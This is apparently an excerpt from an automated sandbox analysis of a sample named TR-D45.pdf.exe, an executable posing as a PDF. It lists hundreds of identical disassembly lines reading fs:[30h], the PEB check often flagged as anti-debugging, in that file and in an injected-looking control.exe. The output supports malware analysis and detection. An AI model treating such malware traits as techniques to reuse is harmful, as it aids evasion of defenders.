      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E2E6DC9 mov eax, dword ptr fs:[00000030h] 1_2_1E2E6DC9
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E2E6DC9 mov ecx, dword ptr fs:[00000030h] 1_2_1E2E6DC9
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E2E6DC9 mov eax, dword ptr fs:[00000030h] 1_2_1E2E6DC9
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E2E6DC9 mov eax, dword ptr fs:[00000030h] 1_2_1E2E6DC9
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E2A4A2C mov eax, dword ptr fs:[00000030h] 1_2_1E2A4A2C
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E2A4A2C mov eax, dword ptr fs:[00000030h] 1_2_1E2A4A2C
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E32AA16 mov eax, dword ptr fs:[00000030h] 1_2_1E32AA16
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E32AA16 mov eax, dword ptr fs:[00000030h] 1_2_1E32AA16
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E278A0A mov eax, dword ptr fs:[00000030h] 1_2_1E278A0A
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E26AA16 mov eax, dword ptr fs:[00000030h] 1_2_1E26AA16
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E26AA16 mov eax, dword ptr fs:[00000030h] 1_2_1E26AA16
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E283A1C mov eax, dword ptr fs:[00000030h] 1_2_1E283A1C
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E265210 mov eax, dword ptr fs:[00000030h] 1_2_1E265210
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E265210 mov ecx, dword ptr fs:[00000030h] 1_2_1E265210
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E265210 mov eax, dword ptr fs:[00000030h] 1_2_1E265210
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E265210 mov eax, dword ptr fs:[00000030h] 1_2_1E265210
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E2A927A mov eax, dword ptr fs:[00000030h] 1_2_1E2A927A
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E31B260 mov eax, dword ptr fs:[00000030h] 1_2_1E31B260
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E31B260 mov eax, dword ptr fs:[00000030h] 1_2_1E31B260
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E338A62 mov eax, dword ptr fs:[00000030h] 1_2_1E338A62
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E269240 mov eax, dword ptr fs:[00000030h] 1_2_1E269240
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E269240 mov eax, dword ptr fs:[00000030h] 1_2_1E269240
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E269240 mov eax, dword ptr fs:[00000030h] 1_2_1E269240
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E269240 mov eax, dword ptr fs:[00000030h] 1_2_1E269240
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E32EA55 mov eax, dword ptr fs:[00000030h] 1_2_1E32EA55
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E2F4257 mov eax, dword ptr fs:[00000030h] 1_2_1E2F4257
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E2652A5 mov eax, dword ptr fs:[00000030h] 1_2_1E2652A5
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E2652A5 mov eax, dword ptr fs:[00000030h] 1_2_1E2652A5
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E2652A5 mov eax, dword ptr fs:[00000030h] 1_2_1E2652A5
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E2652A5 mov eax, dword ptr fs:[00000030h] 1_2_1E2652A5
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E2652A5 mov eax, dword ptr fs:[00000030h] 1_2_1E2652A5
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E27AAB0 mov eax, dword ptr fs:[00000030h] 1_2_1E27AAB0
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E27AAB0 mov eax, dword ptr fs:[00000030h] 1_2_1E27AAB0
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E29FAB0 mov eax, dword ptr fs:[00000030h] 1_2_1E29FAB0
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E29D294 mov eax, dword ptr fs:[00000030h] 1_2_1E29D294
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E29D294 mov eax, dword ptr fs:[00000030h] 1_2_1E29D294
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E292AE4 mov eax, dword ptr fs:[00000030h] 1_2_1E292AE4
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E292ACB mov eax, dword ptr fs:[00000030h] 1_2_1E292ACB
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E32131B mov eax, dword ptr fs:[00000030h] 1_2_1E32131B
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E26DB60 mov ecx, dword ptr fs:[00000030h] 1_2_1E26DB60
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E293B7A mov eax, dword ptr fs:[00000030h] 1_2_1E293B7A
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E293B7A mov eax, dword ptr fs:[00000030h] 1_2_1E293B7A
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E26DB40 mov eax, dword ptr fs:[00000030h] 1_2_1E26DB40
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E338B58 mov eax, dword ptr fs:[00000030h] 1_2_1E338B58
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E26F358 mov eax, dword ptr fs:[00000030h] 1_2_1E26F358
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E294BAD mov eax, dword ptr fs:[00000030h] 1_2_1E294BAD
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E294BAD mov eax, dword ptr fs:[00000030h] 1_2_1E294BAD
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E294BAD mov eax, dword ptr fs:[00000030h] 1_2_1E294BAD
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E335BA5 mov eax, dword ptr fs:[00000030h] 1_2_1E335BA5
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E271B8F mov eax, dword ptr fs:[00000030h] 1_2_1E271B8F
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E271B8F mov eax, dword ptr fs:[00000030h] 1_2_1E271B8F
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E31D380 mov ecx, dword ptr fs:[00000030h] 1_2_1E31D380
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E32138A mov eax, dword ptr fs:[00000030h] 1_2_1E32138A
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E29B390 mov eax, dword ptr fs:[00000030h] 1_2_1E29B390
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E292397 mov eax, dword ptr fs:[00000030h] 1_2_1E292397
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E28DBE9 mov eax, dword ptr fs:[00000030h] 1_2_1E28DBE9
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E2903E2 mov eax, dword ptr fs:[00000030h] 1_2_1E2903E2
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E2903E2 mov eax, dword ptr fs:[00000030h] 1_2_1E2903E2
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E2903E2 mov eax, dword ptr fs:[00000030h] 1_2_1E2903E2
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E2903E2 mov eax, dword ptr fs:[00000030h] 1_2_1E2903E2
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E2903E2 mov eax, dword ptr fs:[00000030h] 1_2_1E2903E2
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E2903E2 mov eax, dword ptr fs:[00000030h] 1_2_1E2903E2
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E2E53CA mov eax, dword ptr fs:[00000030h] 1_2_1E2E53CA
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E2E53CA mov eax, dword ptr fs:[00000030h] 1_2_1E2E53CA
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E29002D mov eax, dword ptr fs:[00000030h] 1_2_1E29002D
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E29002D mov eax, dword ptr fs:[00000030h] 1_2_1E29002D
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E29002D mov eax, dword ptr fs:[00000030h] 1_2_1E29002D
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E29002D mov eax, dword ptr fs:[00000030h] 1_2_1E29002D
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E29002D mov eax, dword ptr fs:[00000030h] 1_2_1E29002D
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E27B02A mov eax, dword ptr fs:[00000030h] 1_2_1E27B02A
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E27B02A mov eax, dword ptr fs:[00000030h] 1_2_1E27B02A
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E27B02A mov eax, dword ptr fs:[00000030h] 1_2_1E27B02A
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E27B02A mov eax, dword ptr fs:[00000030h] 1_2_1E27B02A
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E334015 mov eax, dword ptr fs:[00000030h] 1_2_1E334015
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E334015 mov eax, dword ptr fs:[00000030h] 1_2_1E334015
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E2E7016 mov eax, dword ptr fs:[00000030h] 1_2_1E2E7016
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E2E7016 mov eax, dword ptr fs:[00000030h] 1_2_1E2E7016
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E2E7016 mov eax, dword ptr fs:[00000030h] 1_2_1E2E7016
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E322073 mov eax, dword ptr fs:[00000030h] 1_2_1E322073
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E331074 mov eax, dword ptr fs:[00000030h] 1_2_1E331074
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E280050 mov eax, dword ptr fs:[00000030h] 1_2_1E280050
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E280050 mov eax, dword ptr fs:[00000030h] 1_2_1E280050
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E2A90AF mov eax, dword ptr fs:[00000030h] 1_2_1E2A90AF
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E2920A0 mov eax, dword ptr fs:[00000030h] 1_2_1E2920A0
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E2920A0 mov eax, dword ptr fs:[00000030h] 1_2_1E2920A0
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E2920A0 mov eax, dword ptr fs:[00000030h] 1_2_1E2920A0
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E2920A0 mov eax, dword ptr fs:[00000030h] 1_2_1E2920A0
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E2920A0 mov eax, dword ptr fs:[00000030h] 1_2_1E2920A0
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E2920A0 mov eax, dword ptr fs:[00000030h] 1_2_1E2920A0
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E29F0BF mov ecx, dword ptr fs:[00000030h] 1_2_1E29F0BF
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E29F0BF mov eax, dword ptr fs:[00000030h] 1_2_1E29F0BF
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E29F0BF mov eax, dword ptr fs:[00000030h] 1_2_1E29F0BF
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E269080 mov eax, dword ptr fs:[00000030h] 1_2_1E269080
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E2E3884 mov eax, dword ptr fs:[00000030h] 1_2_1E2E3884
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E2E3884 mov eax, dword ptr fs:[00000030h] 1_2_1E2E3884
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E2640E1 mov eax, dword ptr fs:[00000030h] 1_2_1E2640E1
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E2640E1 mov eax, dword ptr fs:[00000030h] 1_2_1E2640E1
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E2640E1 mov eax, dword ptr fs:[00000030h] 1_2_1E2640E1
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E2658EC mov eax, dword ptr fs:[00000030h] 1_2_1E2658EC
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E2FB8D0 mov eax, dword ptr fs:[00000030h] 1_2_1E2FB8D0
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E2FB8D0 mov ecx, dword ptr fs:[00000030h] 1_2_1E2FB8D0
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E2FB8D0 mov eax, dword ptr fs:[00000030h] 1_2_1E2FB8D0
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E2FB8D0 mov eax, dword ptr fs:[00000030h] 1_2_1E2FB8D0
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E2FB8D0 mov eax, dword ptr fs:[00000030h] 1_2_1E2FB8D0
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E2FB8D0 mov eax, dword ptr fs:[00000030h] 1_2_1E2FB8D0
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E284120 mov eax, dword ptr fs:[00000030h] 1_2_1E284120
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E284120 mov eax, dword ptr fs:[00000030h]1_2_1E284120
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E284120 mov eax, dword ptr fs:[00000030h]1_2_1E284120
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E284120 mov eax, dword ptr fs:[00000030h]1_2_1E284120
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E284120 mov ecx, dword ptr fs:[00000030h]1_2_1E284120
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E29513A mov eax, dword ptr fs:[00000030h]1_2_1E29513A
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E29513A mov eax, dword ptr fs:[00000030h]1_2_1E29513A
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E269100 mov eax, dword ptr fs:[00000030h]1_2_1E269100
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E269100 mov eax, dword ptr fs:[00000030h]1_2_1E269100
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E269100 mov eax, dword ptr fs:[00000030h]1_2_1E269100
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E26C962 mov eax, dword ptr fs:[00000030h]1_2_1E26C962
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E26B171 mov eax, dword ptr fs:[00000030h]1_2_1E26B171
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E26B171 mov eax, dword ptr fs:[00000030h]1_2_1E26B171
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E28B944 mov eax, dword ptr fs:[00000030h]1_2_1E28B944
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E28B944 mov eax, dword ptr fs:[00000030h]1_2_1E28B944
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2E69A6 mov eax, dword ptr fs:[00000030h]1_2_1E2E69A6
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2961A0 mov eax, dword ptr fs:[00000030h]1_2_1E2961A0
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2961A0 mov eax, dword ptr fs:[00000030h]1_2_1E2961A0
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2E51BE mov eax, dword ptr fs:[00000030h]1_2_1E2E51BE
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2E51BE mov eax, dword ptr fs:[00000030h]1_2_1E2E51BE
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2E51BE mov eax, dword ptr fs:[00000030h]1_2_1E2E51BE
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2E51BE mov eax, dword ptr fs:[00000030h]1_2_1E2E51BE
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E3249A4 mov eax, dword ptr fs:[00000030h]1_2_1E3249A4
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E3249A4 mov eax, dword ptr fs:[00000030h]1_2_1E3249A4
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E3249A4 mov eax, dword ptr fs:[00000030h]1_2_1E3249A4
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E3249A4 mov eax, dword ptr fs:[00000030h]1_2_1E3249A4
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E28C182 mov eax, dword ptr fs:[00000030h]1_2_1E28C182
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E29A185 mov eax, dword ptr fs:[00000030h]1_2_1E29A185
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E292990 mov eax, dword ptr fs:[00000030h]1_2_1E292990
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2F41E8 mov eax, dword ptr fs:[00000030h]1_2_1E2F41E8
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E26B1E1 mov eax, dword ptr fs:[00000030h]1_2_1E26B1E1
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E26B1E1 mov eax, dword ptr fs:[00000030h]1_2_1E26B1E1
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E26B1E1 mov eax, dword ptr fs:[00000030h]1_2_1E26B1E1
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0446A44B mov eax, dword ptr fs:[00000030h]12_2_0446A44B
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04450050 mov eax, dword ptr fs:[00000030h]12_2_04450050
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04450050 mov eax, dword ptr fs:[00000030h]12_2_04450050
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044CC450 mov eax, dword ptr fs:[00000030h]12_2_044CC450
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044CC450 mov eax, dword ptr fs:[00000030h]12_2_044CC450
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04501074 mov eax, dword ptr fs:[00000030h]12_2_04501074
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0445746D mov eax, dword ptr fs:[00000030h]12_2_0445746D
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044F2073 mov eax, dword ptr fs:[00000030h]12_2_044F2073
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044B6C0A mov eax, dword ptr fs:[00000030h]12_2_044B6C0A
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044B6C0A mov eax, dword ptr fs:[00000030h]12_2_044B6C0A
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044B6C0A mov eax, dword ptr fs:[00000030h]12_2_044B6C0A
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044B6C0A mov eax, dword ptr fs:[00000030h]12_2_044B6C0A
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04504015 mov eax, dword ptr fs:[00000030h]12_2_04504015
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04504015 mov eax, dword ptr fs:[00000030h]12_2_04504015
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044F1C06 mov eax, dword ptr fs:[00000030h]12_2_044F1C06
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044F1C06 mov eax, dword ptr fs:[00000030h]12_2_044F1C06
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044F1C06 mov eax, dword ptr fs:[00000030h]12_2_044F1C06
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044F1C06 mov eax, dword ptr fs:[00000030h]12_2_044F1C06
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044F1C06 mov eax, dword ptr fs:[00000030h]12_2_044F1C06
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044F1C06 mov eax, dword ptr fs:[00000030h]12_2_044F1C06
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044F1C06 mov eax, dword ptr fs:[00000030h]12_2_044F1C06
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044F1C06 mov eax, dword ptr fs:[00000030h]12_2_044F1C06
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044F1C06 mov eax, dword ptr fs:[00000030h]12_2_044F1C06
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044F1C06 mov eax, dword ptr fs:[00000030h]12_2_044F1C06
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044F1C06 mov eax, dword ptr fs:[00000030h]12_2_044F1C06
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044F1C06 mov eax, dword ptr fs:[00000030h]12_2_044F1C06
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044F1C06 mov eax, dword ptr fs:[00000030h]12_2_044F1C06
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044F1C06 mov eax, dword ptr fs:[00000030h]12_2_044F1C06
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044B7016 mov eax, dword ptr fs:[00000030h]12_2_044B7016
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044B7016 mov eax, dword ptr fs:[00000030h]12_2_044B7016
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044B7016 mov eax, dword ptr fs:[00000030h]12_2_044B7016
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0450740D mov eax, dword ptr fs:[00000030h]12_2_0450740D
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0450740D mov eax, dword ptr fs:[00000030h]12_2_0450740D
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0450740D mov eax, dword ptr fs:[00000030h]12_2_0450740D
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0446BC2C mov eax, dword ptr fs:[00000030h]12_2_0446BC2C
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0446002D mov eax, dword ptr fs:[00000030h]12_2_0446002D
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0446002D mov eax, dword ptr fs:[00000030h]12_2_0446002D
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0446002D mov eax, dword ptr fs:[00000030h]12_2_0446002D
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0446002D mov eax, dword ptr fs:[00000030h]12_2_0446002D
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0446002D mov eax, dword ptr fs:[00000030h]12_2_0446002D
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0444B02A mov eax, dword ptr fs:[00000030h]12_2_0444B02A
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0444B02A mov eax, dword ptr fs:[00000030h]12_2_0444B02A
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0444B02A mov eax, dword ptr fs:[00000030h]12_2_0444B02A
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0444B02A mov eax, dword ptr fs:[00000030h]12_2_0444B02A
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04508CD6 mov eax, dword ptr fs:[00000030h]12_2_04508CD6
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044CB8D0 mov eax, dword ptr fs:[00000030h]12_2_044CB8D0
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044CB8D0 mov ecx, dword ptr fs:[00000030h]12_2_044CB8D0
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044CB8D0 mov eax, dword ptr fs:[00000030h]12_2_044CB8D0
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044CB8D0 mov eax, dword ptr fs:[00000030h]12_2_044CB8D0
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044CB8D0 mov eax, dword ptr fs:[00000030h]12_2_044CB8D0
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044CB8D0 mov eax, dword ptr fs:[00000030h]12_2_044CB8D0
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044358EC mov eax, dword ptr fs:[00000030h]12_2_044358EC
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044F14FB mov eax, dword ptr fs:[00000030h]12_2_044F14FB
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044B6CF0 mov eax, dword ptr fs:[00000030h]12_2_044B6CF0
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044B6CF0 mov eax, dword ptr fs:[00000030h]12_2_044B6CF0
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044B6CF0 mov eax, dword ptr fs:[00000030h]12_2_044B6CF0
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04439080 mov eax, dword ptr fs:[00000030h]12_2_04439080
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044B3884 mov eax, dword ptr fs:[00000030h]12_2_044B3884
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044B3884 mov eax, dword ptr fs:[00000030h]12_2_044B3884
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0444849B mov eax, dword ptr fs:[00000030h]12_2_0444849B
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044620A0 mov eax, dword ptr fs:[00000030h]12_2_044620A0
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044620A0 mov eax, dword ptr fs:[00000030h]12_2_044620A0
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044620A0 mov eax, dword ptr fs:[00000030h]12_2_044620A0
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044620A0 mov eax, dword ptr fs:[00000030h]12_2_044620A0
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044620A0 mov eax, dword ptr fs:[00000030h]12_2_044620A0
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044620A0 mov eax, dword ptr fs:[00000030h]12_2_044620A0
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044790AF mov eax, dword ptr fs:[00000030h]12_2_044790AF
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0446F0BF mov ecx, dword ptr fs:[00000030h]12_2_0446F0BF
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0446F0BF mov eax, dword ptr fs:[00000030h]12_2_0446F0BF
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0446F0BF mov eax, dword ptr fs:[00000030h]12_2_0446F0BF
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0445B944 mov eax, dword ptr fs:[00000030h]12_2_0445B944
